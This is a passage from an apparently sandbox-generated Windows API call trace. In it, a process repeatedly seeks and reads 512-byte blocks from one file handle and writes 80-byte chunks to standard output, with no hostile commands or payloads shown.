(_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.331] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.331] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.332] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.332] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.333] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.334] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.334] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.334] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.335] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.336] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.336] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.337] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.338] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.338] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.338] GetFileType (hFile=0x4c) returned 0x1 [0096.338] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.338] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.338] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.338] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.338] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.338] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.338] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.338] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.338] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.338] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.339] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.339] ReadFile (in: 